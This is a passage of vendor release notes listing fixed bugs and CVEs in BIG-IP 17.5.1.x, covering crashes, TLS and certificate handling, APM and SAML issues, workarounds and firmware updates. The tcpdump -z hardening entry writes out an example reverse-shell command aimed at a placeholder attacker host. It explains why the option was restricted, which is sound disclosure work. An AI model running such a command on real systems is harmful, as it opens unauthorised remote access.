987813-14 : CVE-2020-25643 kernel:improper input validation in the ppp_cp_parse_cr function

Links to More Info: K65234135, BT987813


985329-5 : Saving UCS takes longer and leaves temp files when iControl LX extension is installed

Links to More Info: BT985329

Component: Device Management

Symptoms:
The tmsh command 'save sys ucs' takes longer when iControl LX extensions is installed, and it may leave /shared/tmp/rpm-tmp* files.

You may see warnings that /var is full.

You may also see errors logged in /var/log/restjavad.0.log:

[WARNING][211][date and time UTC][8100/shared/iapp/build-package BuildRpmTaskCollectionWorker] Failed to execute the build command 'rpmbuild -bb --define '_tmppath /shared/tmp' --define 'main /var/config/rest/iapps/f5-service-discovery' --define '_topdir /var/config/rest/node/tmp' '/var/config/rest/node/tmp/ac891731-acb1-4832-b9f0-325e73ed1fd1.spec'', Threw:com.f5.rest.common.CommandExecuteException: Command execution process killed
        at com.f5.rest.common.ShellExecutor.finishExecution(ShellExecutor.java:281)
        at com.f5.rest.common.ShellExecutor.access$000(ShellExecutor.java:33)
        at com.f5.rest.common.ShellExecutor$1.onProcessFailed(ShellExecutor.java:320)
        at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:203)
        at java.lang.Thread.run(Thread.java:748)


Errors logged in /var/log/ltm:

err iAppsLX_save_pre: Failed to get task response within timeout for: /shared/iapp/build-package/a1724a94-fb6b-4b3e-af46-bc982567df8f
err iAppsLX_save_pre: Failed to get getRPM build response within timeout for f5-service-discovery

Conditions:
iControl LX extensions (e.g., AS3, Telemetry) are installed on the BIG-IP system.

Impact:
Saving the UCS file takes a longer time (e.g., ~1-to-2 minutes) than it does if iControl LX extensions are not installed (e.g., ~40 seconds).

/shared/tmp directory is filled with rpm-tmp* files.

Workaround:
The fix of another ID 929213 introduced a new database key iapplxrpm.timeout (default 60 seconds), which allows the RPM build timeout value to be increased.

sys db iapplxrpm.timeout {
    default-value "60"
    scf-config "true"
    value "60"
    value-range "integer min:30 max:600"
}

For example:

tmsh modify sys db iapplxrpm.timeout value 300
tmsh restart sys service restjavad

Increasing the db key and restarting restjavad should not be traffic impacting.

Fix:
Temp files under /shared/tmp is now cleaned up correctly.

Fixed Versions:
17.5.1, 17.5.0, 17.1.2, 16.1.5


981885-8 : CVE-2020-8285 curl: malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used

Links to More Info: K61186963


975605-11 : CVE-2018-1122 procps-ng, procps: Local privilege escalation in top

Links to More Info: K00409335, BT975605


965545-10 : CVE-2020-27617 : QEMU Vulnerability

Links to More Info: K41142448


949509-11 : Eviction Policy UI Hardening

Component: TMOS

Symptoms:
In certain scenarios, Eviction Policy UI does not follow best security practices.

Conditions:
Eviction Policy in Use

Impact:
N/A

Workaround:
None

Fix:
Best security practices are now applied in Eviction Policy UI

Fixed Versions:
17.5.1


945421-12 : CVE-2020-1968: Raccoon vulnerability

Links to More Info: K92451315, BT945421


935769-8 : Upgrading / Rebooting BIG-IP with huge address-list configuration takes a long time

Links to More Info: BT935769

Component: Advanced Firewall Manager

Symptoms:
Version upgrade takes more time than usual when the config contains address-lists with a lot of IP addresses. The same delay will be observed with 'tmsh load sys config' as well.

Conditions:
-- Configure address-list with 10K to 20K IP addresses or address ranges or subnets.
-- Configuration loading (e.g. Post upgrade, running tmsh load sys config, modification of the configuration and subsequent full load as in full config sync)

Impact:
Version upgrade / 'tmsh load sys config' process takes a long time than usual.

Workaround:
1) Convert continuous individual addresses in the address-lists to IP address ranges and subnets if possible.

2) Remove the huge address-lists from config before the upgrade and add back after the upgrade process is finished.

3) Upgrading to a release or EHF that contains the fix for 1209409. 1209409 does not eliminate the issue but it does reduce the time it takes to validate certain address lists.

Fixed Versions:
17.5.1.2


932461-9 : Certificate update on the SSL profile server for the HTTPS monitor: BIG-IP does not use the updated certificate.

Links to More Info: BT932461

Component: Local Traffic Manager

Symptoms:
When you overwrite the certificate that is configured on the SSL profile server and is used with the HTTPS monitor, the BIG-IP system neither uses a client certificate nor continues to use the old certificate.

After you update the certificate, the stored certificate is incremented. However, the monitor log indicates that it is using the old certificate.

Conditions:
--Create a pool with an HTTPS pool member.
--Create an HTTPS monitor with a certificate and key.
--Assign the HTTPS monitor to the HTTPS pool.
--Update the certificate through GUI or TMSH.

Impact:
The monitor tries to use the old certificate or does not present a client certificate after the update.

Workaround:
Use one of the following workarounds:

-- Restart bigd:
bigstart restart bigd

-- Modify the server SSL profile certificate key. Set it to ‘none’, and switch back to the original certificate key name.

The bigd utility successfully loads the new certificate file.

Fixed Versions:
17.5.1.2


930625-6 : TMM crash is seen due to double free in SAML flow

Links to More Info: BT930625

Component: Access Policy Manager

Symptoms:
When this issue occurs the TMM will crash

Conditions:
Exact reproduction steps are not known but it occurs during SAML transactions

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
N/A

Fixed Versions:
17.5.1


926917-4 : Portal Access: unwanted decoding html entities in attribute values of HTML tags

Links to More Info: BT926917

Component: Access Policy Manager

Symptoms:
HTML Entities in Attribute values in HTML tags are decoded when they shouldn't be.

Conditions:
Portal Access is enabled

Impact:
Unwanted Application errors

Workaround:
None

Fix:
HTML entities in attribute values of HTML tags are no longer decoded by Portal Access

Fixed Versions:
17.5.1


921525-7 : CVE-2020-1752: glibc vulnerability using glob

Links to More Info: K49921213, BT921525


891333-6 : The HSB on BIG-IP platforms can get into a bad state resulting in packet corruption.

Links to More Info: K32545132, BT891333

Component: TMOS

Symptoms:
Networking connectivity issues, such as ARP resolution issues, high availability (HA) failures, health monitor instability, etc.

Packet captures with Wireshark or tshark can be used to show bit-errors/corruption in the network packet for traffic passing through the HSB. This corruption can occur in various parts of the packet such as the MAC address, EtherType, packet checksums, etc.

Conditions:
This can occur on BIG-IP hardware platforms containing a high-speed bridge (HSB).

Impact:
Network connectivity problems on some traffic passing through the affected HSB. Could be reflected in the status of Config Sync or more health monitors down on one member of HA pair.

Workaround:
Reboot the affected device.

If a reboot does not resolve the issue, then its most likely a hardware issue. Please work with Support on a RMA.

F5 has introduced a detection mechanism in newer versions of code. Please refer to the following document for more details: https://cdn.f5.com/product/bugtracker/ID1211513.html

Fix:
New FPGA firmware images are available for this issue.

Fixed Versions:
17.5.1


881065-8 : Adding port-list to Virtual Server changes the route domain to 0

Links to More Info: BT881065

Component: Local Traffic Manager

Symptoms:
When attaching the port-list to virtual server dest:port-list, the route domain of the virtual server is changed to the default value of 0, and the port-list is not correctly applied. This is encountered in the GUI but not in the CLI.

Conditions:
Using port-list along with virtual server in non default route domain using the GUI.

Impact:
You are unable to use the GUI to attach a port-list that uses a non-default route domain to a virtual server.

Workaround:
Use tmsh to attach a port-list to a virtual server if the port-list uses a non-default route domain.

Fixed Versions:
17.5.1


874521-3 : OpenSSL vulnerability: CVE-2019-1551

Links to More Info: K43798238


872109-12 : CVE-2019-17563: Tomcat Vulnerability

Links to More Info: K24551552


867253-7 : Systemd not deleting user journals

Links to More Info: BT867253

Component: TMOS

Symptoms:
When setting 'SystemMaxUse' to any value, systemd does not honor this limit, and the specified size is exceeded.

Conditions:
Using a non-TMOS user account with external authentication permission.

Note: Systemd-journald is configured to create a user journal for every remote user that logs into the BIG-IP system.

Impact:
Journald filling up the file system. These journals are allocated with a minimum size of 4MiB and are not removed when the log entries age-out.

Workaround:
Option 1:
To immediately free up space, manually remove per-user journal logs from the following location:
  /var/log/journal/*/user-*

Option 2:
To prevent the system from creating these journal files going forward:

1. Edit /etc/systemd/journald.conf and add the following at the bottom of the file:
  SplitMode=none

2. Restart systemd-journal service
  # systemctl restart systemd-journald

3. Delete the existing user journal files from /var/log
  # rm /var/log/journal/*/user-*

Note:
-- You must apply this workaround separately to each blade of a VIPRION or vCMP guest running on a VIPRION.
-- You must reapply this workaround after performing software installations.

Fixed Versions:
17.5.1


857045-6 : LDAP system authentication may stop working

Links to More Info: BT857045

Component: TMOS

Symptoms:
If the system daemon responsible for LDAP authentication crashes, the system will not automatically restart it, and remote LDAP authentication may stop working.

In /var/log/daemon.log, you may see the following:

warning systemd[1]: nslcd.service failed

Conditions:
Nslcd daemon crashed, and it fails to restart.

Impact:
System authentication stops working until nslcd is restarted.

Workaround:
Manually restart nslcd daemon:

systemctl start nslcd



nslcd can be reconfigured to restart automatically and create core files when it crashes, though these changes will be lost across software installs (and is not backed up as part of a UCS archive):

1. Run "systemctl edit nslcd", which will open a text editor (by default, nano).

2. In the text editor, add these contents:

[Service]

# Allow core files
LimitCORE=infinity
# Try to keep auth daemon running, even if it crashes
Restart=always

3. Exit the text editor and save the file

4. Check the output of "systemctl status nslcd" for any warnings/errors from systemd as a result of editing the file; there should not be any.

5. Restart nslcd:
   systemctl restart nslcd

Fixed Versions:
17.5.1, 16.1.5


811829-3 : BIG-IP as Authorization server: OAuth Report GUI display expired token as active

Links to More Info: BT811829

Component: Access Policy Manager

Symptoms:
Expired tokens status is shown as ACTIVE in the GUI whereas it is shown AS EXPIRED in the CLI via tmsh list apm oauth token-details

Conditions:
-- Access tokens/Refresh tokens should be expired

Impact:
Misleading information regarding the token status

Workaround:
Uuse 'tmsh list apm oauth token-details' but this shows only the first 100 tokens

Fix:
Made GUI changes to match the tmsh functionality

Fixed Versions:
17.5.1


798889-3 : CVE-2018-20836 kernel: race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c leads to use-after-free

Links to More Info: K11225249


785209-6 : CVE-2019-9074 binutils: out-of-bound read in function bfd_getl32

Links to More Info: K09092524, BT785209


765053-11 : OpenSSL vulnerability CVE-2019-1559

Links to More Info: K18549143


760895-13 : CVE-2009-5155 glibc: parse_reg_exp in posix/regcomp.c misparses alternatives leading to denial of service or trigger incorrect result

Links to More Info: K64119434, BT760895


740258-2 : Support IPv6 connections to TACACS+ remote auth servers

Links to More Info: BT740258

Component: TMOS

Symptoms:
Pam_tacplus package 1.2.9 does not support IPv6 connections to TACACS+ remote auth server

Conditions:
IPv6 connections to TACACS+ remote auth server in system-auth methods

Impact:
On a pure IPv6 network, or a network where their TACACS server is only reachable via IPv6, will not be able to use TACACS for system-auth

Workaround:
None

Fix:
NA

Fixed Versions:
17.5.1


648946-4 : Oauth server is not registered in the map for HA addresses

Links to More Info: BT648946

Component: Access Policy Manager

Symptoms:
The same loopback address is assigned to two listeners.

Conditions:
-- AAA Servers with pool.
-- OAuth Server.

Impact:
Traffic issues due loopback address that is assigned to OAuth Server, can be assigned to some other AAA Server that also uses pool.

Workaround:
None

Fixed Versions:
17.5.1


641662-1 : Always connected exclusion list does not support more than 10 entries.

Links to More Info: BT641662

Component: Access Policy Manager

Symptoms:
In locked client mode, APM provides a way to configure destinations that can still be reached by client, even in locked client mode. Number of entries is limited to 10.

Conditions:
Locked client mode is enabled

Impact:
More than 10 exclusions cannot be added

Workaround:
None

Fixed Versions:
17.5.1


634576-6 : TMM core in per-request policy

Links to More Info: K48181045, BT634576

Component: Access Policy Manager

Symptoms:
TMM might core in cases when per-request policy encounters a reject ending and the server-side flow is not available.

Conditions:
APM or SWG per-request policy with reject ending.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None.

Fix:
TMM no longer cores when per-request policy encounters reject ending.

Fixed Versions:
17.5.1, 16.1.5, 13.1.0


608745-3 : Send HOST header in OCSP responder request

Component: Access Policy Manager

Symptoms:
HOST header not sent in OCSP responder request. APM OCSP responder object uses HTTP/1.0 to send a request to the OCSP responder and HTTP/1.0 does not have a host header.

Conditions:
OCSP configuration

Impact:
APM receives an invalid response because the OCSP Server didn't know which site to send the request to due to no HOST header.

Workaround:
Create a layer virtual server listening on the IP of the ocsp server and having an irule insert the host header.
ltm rule ocsp_insert_http_host {
    when HTTP_REQUEST {
        HTTP::header insert Host <e.g. IP address>
    }
}

Fix:
HOST header added in OCSP responder request for HTTP/1.1.

Fixed Versions:
17.5.1.2


485387-2 : EncryptedAssertion may not be processed by BIG-IP as SP when EncryptedKey element is specified by RetrievalMethod Element by external IdP.

Links to More Info: BT485387

Component: Access Policy Manager

Symptoms:
An encrypted assertion from an external SAML Identity Provider (IdP) can contain the RetrievalMethod element to specify a link to the EncryptedKey element. The EncryptedKey element contains the key for decrypting the CipherData associated with an EncryptedData element.

BIG-IP configured as a Service Provider (SP) does not support the RetrievalMethod element while processing an encrypted assertion. As a result, the assertion is not processed properly, and error messages are printed to the log files: "Cannot decrypt SAML Assertion" and "failed to process encrypted assertion, error: Cipher value from EncryptedKey element not found".

Conditions:
External IdP uses RetrievalMethod to specify EncryptedKey element.

BIG-IP is configured as SP. BIG-IP requires received assertions to be encrypted.

Impact:
Authentication will fail due to inability to process assertion.

Workaround:
To work around the problem, reconfigure IdP to use embedded EncryptedKey instead of using RetrievalMethod.

Fixed Versions:
17.5.1


2017137 : pkcs11d Crash Risk Due to Unbounded Label/Password Length from MCPd

Component: Local Traffic Manager

Symptoms:
Unexpected behaviour or even a crash of pkcs11d

Conditions:
Configure the label/password values more than or equal to 32 characters.

Impact:
Configuring the label or password exceeding the allowed length, it could lead to memory corruption, unexpected behavior, or even a crash of the pkcs11d daemon.

Workaround:
Configure the values with Len 31 or below.

Fix:
The daemon now gracefully rejects inputs that exceed the length limit, logs an appropriate error, and exits the operation safely.

Fixed Versions:
17.5.1.2


1983321-1 : CVE-2025-48976 apache-commons-fileupload: Apache Commons FileUpload DoS via part headers

Links to More Info: K000152614


1983229-4 : Security exposure with -z (postrotate-command) option in tcpdump

Component: TMOS

Symptoms:
tcpdump accepts any arbitrary command as an argument to the -z option.

Example:

tcpdump -i mgmt -w trace.pcap -C 1 -z /bin/php


would execute /bin/php after file rotation.

There is no restriction on allowed commands.

Conditions:
-- Running tcpdump with the -z option on affected versions.

-- Any command, including non-compression binaries, scripts, or potentially destructive utilities, can be passed to -z.

Impact:
Arbitrary Command Execution: Any binary/script can be executed, leading to privilege escalation or system compromise.

Reverse Bash Access: A malicious user could pass a reverse shell command (e.g., bash -i >& /dev/tcp/attacker/4444 0>&1) via -z, establishing remote access to the system.

Data & System Risk: Unsafe commands could delete, modify, or exfiltrate sensitive data.

Operational Risk: Unstable post-processing commands may cause tcpdump capture rotation to fail.

Compliance Risk: Systems may fail to meet FIPS, DISA STIG, or other security standards requiring restricted command execution.

Workaround:
Do not use the -z option or use the safe post-rotate commands Eg: gzip, xz, pigz

Fix:
The -z option has been restricted to allow only safe compression utilities:

gzip, xz, pigz

Any other command provided to -z will be rejected with an error:

Unsafe command for -z option: <command>. Allowed: gzip, xz, pigz.


This prevents arbitrary command execution and eliminates the risk of reverse bash access via tcpdump -z.

Fixed Versions:
17.5.1.2


1983185-1 : REST API queries sent to BIG-IP v17.5.1 fail if they are using v17.5.0 API version

Links to More Info: BT1983185

Component: TMOS

Symptoms:
When using REST API to issue commands to a BIG-IP system and specifying the API version to use, BIG-IP v17.5.1 does not recognize v17.5.0 as a supported version and raises an error:

"Version 17.5.0 is not supported"

This causes BIG-IQ to no longer be able to discover a BIG-IP running on 17.5.1

Conditions:
1. A REST API query is sent to a BIG-IP v17.5.1 system
2. This REST API query uses v17.5.0 API version by including 'ver=17.5.0' in the query string.

Impact:
Any REST API query sent to a BIG-IP v17.5.1 fails if it has 'ver=17.5.0' in the query string. This leads to an unreliable REST API on BIG-IP v17.5.1.

One such business impact is that BIG-IPs become unmanageable from BIG-IQs as the REST API queries are still using v17.5.0 API version in them.

Workaround:
When sending a REST API query to BIG-IP v17.5.1, use a different available API version other than v17.5.0.

For ex. Instead of 'ver=17.5.0', use 'ver=17.1.1'.
restcurl -u admin "/tm/sys/provision/urldb?ver=17.5.0"
restcurl -u admin "/tm/sys/provision/urldb?ver=17.1.1"

Fix:
BIG-IP v17.5.1 now recognizes v17.5.0 as a supported version in the context of REST API commands

Fixed Versions:
17.5.1.2


1966729-1 : Endpoint inspection not working with chrome browser

Component: Access Policy Manager

Symptoms:
Endpoint inspection may not start when virtual server is accessed from Chrome browser of MacOS. When refreshed it may work properly.

Also client-type agent in access policy incorrectly detects MacOS as win11.

Conditions:
-- User accesses virtual server via a Chrome browser on MacOS.
-- Access policy has "client os" agent in VPE.

Impact:
Server incorrectly detects client platform macOS as win11

Workaround:
When HTTP_REQUEST {

if {[HTTP::uri] equals "/my.policy"} {
if {[HTTP::header exists "Sec-CH-UA-Platform-Version"] && [HTTP::header exists "Sec-CH-UA-Platform"]} {
set platform [string tolower [HTTP::header value "Sec-CH-UA-Platform"]]
set platform [string tolower [string trim [string map {\" ""} $platform]]]
if { $platform ne "windows" } {
         HTTP::header remove "Sec-CH-UA-Platform-Version"
         log local0. "Removing header $platform"
}
}
}
}

when CLIENT_ACCEPTED {
    ACCESS::restrict_irule_events disable
}

Fix:
Server should detect platform correctly if client is using macOS.

Fixed Versions:
17.5.1.2


1965849-1 : [APM] TMM core is observed in validating the saml assertion signature

Links to More Info: BT1965849

Component: Access Policy Manager

Symptoms:
In SAML assertion signature validation, there is an error scenario where a macro in the defined log expects multiple arguments, which have been incorrectly passed.

Conditions:
SAML SP is configured with
- Invalid certificates.
- Or incorrect permission for certificates.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
SAML is configured with proper certificates with proper permissions.

Fixed Versions:
17.5.1.2


1965053-1 : Keymgmtd: Incorrect and misleading debug log statements

Links to More Info: BT1965053

Component: TMOS

Symptoms:
A few debug log statements in the keymgmtd daemon are inaccurate or misleading, resulting in confusion and difficulty when troubleshooting production issues.

Conditions:
Reviewing keymgmtd logs

Impact:
Misleading debug log messages

Workaround:
None

Fix:
Fixed misleading log messages

Fixed Versions:
17.5.1.2


1962785-3 : Monitors of type snmp_link can fail

Component: Global Traffic Manager (DNS)

Symptoms:
Monitors of type snmp_link can fail as they may not be added to the active probe list.

Conditions:
Use of monitor type snmp_link.

Impact:
Availability status may be shown in red.

Workaround:
None

Fix:
Removed the condition check for adding Monitors to the active probe list.

Fixed Versions:
17.5.1.2


1952729-1 : Certificates with explicitly defined EC parameters are treated as invalid in Common Criteria mode and TLS communication will be rejected.

Links to More Info: BT1952729

Component: TMOS

Symptoms:
In Common Criteria mode, BIG-IP accepts certificates with explicit EC parameters

Conditions:
1. BIG-IP is in Common Criteria (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params.

Impact:
In Common Criteria mode, BIG-IP accepts certificates with explicit EC parameters and TLS connection is successful.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined EC params by BIG-IP.

Fixed Versions:
17.5.1.2


1952657-1 : In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted

Links to More Info: BT1952657

Component: Local Traffic Manager

Symptoms:
BIG-IP accepts certificates with explicit EC parameters enabled while importing and handshakes will be successful.

Conditions:
1. BIG-IP is in CC (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params

Impact:
BIG-IP improperly imports certificates with explicitly-defined EC params when running in Common Criteria mode.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined ec params by BIG-IP while importing

Fixed Versions:
17.5.1.2


1937817-4 : CVE-2025-54500: A Particular HTTP/2 sequence may cause High CPU utilization [MadeYouReset]

Links to More Info: K000152001


1937777-1 : The client can resume a TLS session using psk_ke mode in the psk_key_exchange_modes extension.

Links to More Info: BT1937777

Component: Local Traffic Manager

Symptoms:
In TLS, the psk_key_exchange_modes extension in the Client Hello specifies the supported key exchange modes for resuming sessions with pre-shared keys (PSK).
As per Common Criteria guidelines, if client hello contains only psk_ke mode in the "psk_key_exchange_modes" extension then TLS handshake either (1) implicitly rejects the session ticket by performing a full handshake, or (2) terminates the TLS handshake to prevent the flow of application data.

Conditions:
In ClientHello, only psk_ke mode should be present in the "psk_key_exchange_modes" extension.
ClientHello should contain "pre_shared_key" extension too.

Impact:
TLS handshake will be successful with this configuration.

Workaround:
None

Fix:
Updated the code to perform full handshake if psk_ke mode present in the "psk_key_exchange_modes" extension.

Fixed Versions:
17.5.1.2


1936421-2 : Core generated for autodosd daemon when synchronization process is terminated

Links to More Info: BT1936421

Component: Advanced Firewall Manager

Symptoms:
Autodosd cores on SIGSEGV.

Conditions:
-- AFM DoS vectors configured
-- This can occur during normal operation but the specific conditions that trigger it are unknown

Impact:
Autodosd is restarted, but up to 15 seconds of history may be lost.

Workaround:
None

Fix:
Fixed an autodosd crash.

Fixed Versions:
17.5.1


1936233-1 : TMM mismanagement of IPsec connections can slowly leak memory and cause tunnel negotiation to fail

Links to More Info: BT1936233

Component: TMOS

Symptoms:
-- The BIG-IP cannot setup a specific IPsec tunnel.
-- The BIG-IP may eventually run out of memory, or core

Conditions:
-- IPsec IKEv2
-- Tunnel config changes, or tunnel never works from initial setup

Impact:
-- TMM may run out of memory after a very long time
-- TMM may core due to the leaked connections

Workaround:
None

Fix:
The connection leak will not happen.

Fixed Versions:
17.5.1.2


1935833-2 : Tmm cores with "ERR: Attempting to send MPI message to ourself"

Links to More Info: BT1935833

Component: TMOS

Symptoms:
A TMM crash occurs, tmm_assert is triggered if an MPI message is sent to the same TMM (self).

Conditions:
New IPsec tunnel configured or deleted and High Availability config sync is started.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None.

Fix:
The crash no longer occurs.

Fixed Versions:
17.5.1.2


1934865-1 : Remove multiple redundant entries for port-list objects in configuration file

Links to More Info: BT1934865

Component: Advanced Firewall Manager

Symptoms:
When a port-list object is created using one of the following TMSH CLIs (tmsh create net port-list, tmsh create security firewall port-list, or tmsh create security shared-objects port-list), redundant entries for the same object are generated in the configuration file under three contexts:

net port-list
security firewall port-list
security shared-objects port-list
For example, a port-list created using one CLI results in multiple entries referring to the same schema object, such as:
net port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}

security shared-objects port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}


security firewall port-list /Common/portListExample {
    ports {
        80 { }
        443 { }
    }
}

This behaviour causes unnecessary duplication in the configuration file.

Conditions:
Redundant entries occur in the configuration file when:
A port-list object is created using any one of the following TMSH CLIs:
1. tmsh create net port-list
2. tmsh create security firewall port-list
3. tmsh create security shared-objects port-list
All three CLI commands point to the same object and record three separate entries in the configuration file.

Impact:
Redundant entries in the configuration file lead to:
1. Increased configuration file size unnecessarily.
2. Risk of user confusion during manual editing or review of configuration files.

This issue does not impact runtime functionality or object behaviour, but it introduces maintenance overhead when users interact with their configurations.

Workaround:
None

Fixed Versions:
17.5.1


1934781-2 : In FIPS-CC mode ECC Certificates with explicitly defined EC parameters are accepted

Links to More Info: BT1934781

Component: Local Traffic Manager

Symptoms:
BIG-IP accepts certificates with explicit EC parameters enabled and handshakes will be successful.

Conditions:
1. BIG-IP is in CC (Common Criteria) mode
2. BIG-IP has ECC certificates as a Server and/or Clients/Servers interacting with BIG-IP sending ECC certificates with Explicit EC params

Impact:
BIG-IP improperly accepts certificates with explicitly-defined EC params when running in Common Criteria mode.

Workaround:
None

Fix:
Added fix to reject certificates with explicit defined ec params by BIG-IP

Fixed Versions:
17.5.1.2


1934513-2 : Redefinition of xlink namespace leads to 'malformed document' violation

Component: Application Security Manager

Symptoms:
An unexpected 'malformed document' violation is seen

Conditions:
- XML schema with redefined xlink namespace is set
- Request contains redefined xlink namespace

Impact:
False positive

Workaround:
None

Fix:
Redefinition of xlink namespace can be enabled through setting ASM internal variable 'allowXLINKRename' to 1

Fixed Versions:
17.5.1.2


1934493-2 : BIG-IP SFTP hardening

Component: TMOS

Symptoms:
Under certain conditions SFTP does not follow current best practices.

Conditions:
- Authenticated high-privilege user
- SFTP file transfer

Impact:
BIG-IP does not follow best practices for sftp operations

Workaround:
N/A

Fix:
The SFTP file transfer now follows current best practices.

Fixed Versions:
17.5.1


1934401-1 : iSeries HSB v5.26.8.0 firmware

Links to More Info: BT1934401

Component: TMOS

Symptoms:
iSeries HSB v5.26.8.0 firmware

Conditions:
iSeries i11000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1


1934393-1 : iSeries HSB v5.9.14.0 firmware

Links to More Info: BT1934393

Component: TMOS

Symptoms:
iSeries HSB v5.9.14.0 firmware

Conditions:
iSeries i5000, i7000, or i10000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1


1934385-1 : iSeries HSB v4.3.5.0 firmware

Links to More Info: BT1934385

Component: TMOS

Symptoms:
iSeries HSB v4.3.5.0 firmware

Conditions:
iSeries i2000 or i4000 series appliance

Impact:
Not applicable.

Workaround:
Not applicable.

Fix:
Fixes HSB bit-flip issues. See ID891333 for more information.

Fixed Versions:
17.5.1


1930945 : [APM][KERBEROS][NTLM FALLBACK] Kerberos Authentication fails post-upgrade to v17.5.0/v17.5.1 — “Profile '/Common/kerberos_auth_config_default' was not found” and ECA Crashes

Links to More Info: BT1930945

Component: Access Policy Manager

Symptoms:
1.ECA process continuously restarts (SIGSEGV/crash).

2. /var/log/apm contains errors indicating missing Kerberos config and NTLM fallback.

Conditions:
1. kerberos usecase

Impact:
1. Kerberos authentication fails, leading to unsuccessful proxy access for domain-joined users.

Workaround:
None

Fixed Versions:
17.5.1


1928749-2 : TMM cores in rare circumstances

Links to More Info: BT1928749

Component: TMOS

Symptoms:
TMM cores in rare circumstances

Conditions:
Can occur after High Availability (HA) failover.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None

Fix:
TMM crash prevented.

Fixed Versions:
17.5.1.2


1928537-1 : Missing initial PKCS11d login state causes login failures on certain AWS CloudHSMs

Links to More Info: BT1928537

Component: Local Traffic Manager

Symptoms:
The PKCS11d daemon did not properly initialize the login state for each partition. It was previously assumed that a user was effectively “logged in” on startup, even though no explicit state indicated CKR_USER_NOT_LOGGED_IN.

This worked with older HSMs and earlier AWS CloudHSM SDK3 primarily because those libraries did not strictly require an explicit CKR_USER_NOT_LOGGED_IN state; they would either auto-login or return CKR_USER_ALREADY_LOGGED_IN in most cases.

However, newer AWS CloudHSM libraries (SDK5) and other current HSM vendors require a proper indication that the user is not logged in to handle re-login flows correctly.

Conditions:
Use SDK version 5 with BIG-IP.

Impact:
Key creation fails.

Workaround:
None

Fix:
- This fix is applied to all HSMs, not just AWS CloudHSM. Each partition starts in a well-defined, “not logged in” state. It only transitions to CKR_OK or CKR_USER_ALREADY_LOGGED_IN when the device confirms the user is authenticated.

- The change sets the hsm_partitions.array[slot].login_status = CKR_USER_NOT_LOGGED_IN during session/partition initialization.

Fixed Versions:
17.5.1


1927513-1 : SIGSEGV TMM core ikev2_encrypt_packet_construct at iked/ikev2_packet.c:334

Component: TMOS

Symptoms:
Crashes after many failovers when upgraded from 15.1.x to 17.1.x version.

Conditions:
Failover

Impact:
Crash and tmm restartsTraffic is disrupted when tmm restarts.

Fix:
Use sys-db variable "ipsec.removeredundantsa" to avoid the crash.

Fixed Versions:
17.5.1.2


1927225-2 : Vertical tab (u000b) is removed from the request by the JSON parser

Links to More Info: BT1927225

Component: Application Security Manager

Symptoms:
The JSON parser removes the vertical tab (\u00b) from the request, preventing attack signatures from matching and causing the request to be bypassed.

Conditions:
Attaching the JSON profile, send a request with a vertical tab (\u000b).

Impact:
Attack signatures are not matched to the SQL injection attack vector.

Workaround:
None

Fixed Versions:
17.5.1.2


1926989-1 : BIG-IP Virtual Edition: kswapd running constantly and consuming most of the CPU cycles of a core

Links to More Info: BT1926989

Component: TMOS

Symptoms:
After a new installation or after an upgrade to of a Virtual Edition to one of the affected versions, the 'kswapd' daemon runs constantly, consuming up to 100% of the cycles of a CPU core.

Swap use may be higher after upgrade.

Conditions:
- installation of a new BIG-IP Virtual Edition

or

- upgrade of a BIG-IP Virtual Edition to one of the affected versions

Impact:
A CPU core constantly consuming most of its CPU cycles.
General slowness of the system.

Swap use may be higher after upgrade.

Workaround:
If the problem is present after a TMOS upgrade:
- check what was the value of vm.min_free_kbytes before the upgrade by booting back in the previous volume
- set the same value in the new volume with the command:

# sysctl -w vm.min_free_kbytes=<VALUE>

No reboot or tmm restart is needed.




If the Virtual Edition is a fresh install:

- set the vm.min_free_kbytes value to 24141

# sysctl -w vm.min_free_kbytes=24141

No reboot or tmm restart is needed.

You may need to follow the "Additional Information" section in https://my.f5.com/manage/s/article/K000150960 to ensure that the changes persist after a reboot.

Fix:
Vm.min_free_kbytes is given the correct value.

Fixed Versions:
17.5.1


1926885 : [APM] URL DB mismatch error for Religion categories in the upgrade

Links to More Info: BT1926885

Component: Access Policy Manager

Symptoms:
Error messages in /var/log/apm

"The requested URL Category (/Common/Lesser-Known_Religions) was not found."
"The requested URL Category (/Common/Widely-Known_Religions) was not found."

Conditions:
APM provisions and SWG database downloads enabled.

Impact:
Upgrades fails with below error:

There were warnings:
Category name changed from /Common/Lesser_Known_Religions to in allowed categories of url filter /Common/test_filter
Category name changed from /Common/Widely_Known_Religions to in allowed categories of url filter /Common/test_filter
Compliance '/Common/gtp_unknown_tunnel_id' is deprecated and removed from '/Common/protocol_inspection'.
Compliance '/Common/smtp_command_length_overflow' is deprecated and removed from '/Common/protocol_inspection'.
01070734:3: Configuration error: In url-filter (/Common/<filter>), allowed-category () does not exist. In url-filter (/Common/<filter>), allowed-category () does not exist.
Unexpected Error: Loading configuration process failed.

Workaround:
Edit the respective categories before upgrading to the latest version.

1. Edit bigip.conf
2. Look for the respective failure filter name and change the
Lesser_Known_Religions to Lesser-Known_Religions and
Widely_Known_Religions to Widely-Known_Religions
3. Save the file
4. Update the configuration using tmsh save/load sys config

Fix:
Corrected category names in the configuration to address upgrade failures from older versions to 17.5.x caused by mismatches. The handling is implemented in the fixup script, which is triggered when a URL Filter is configured.

Fixed Versions:
17.5.1


1922525-1 : BIG-IP SCP hardening

Component: TMOS

Symptoms:
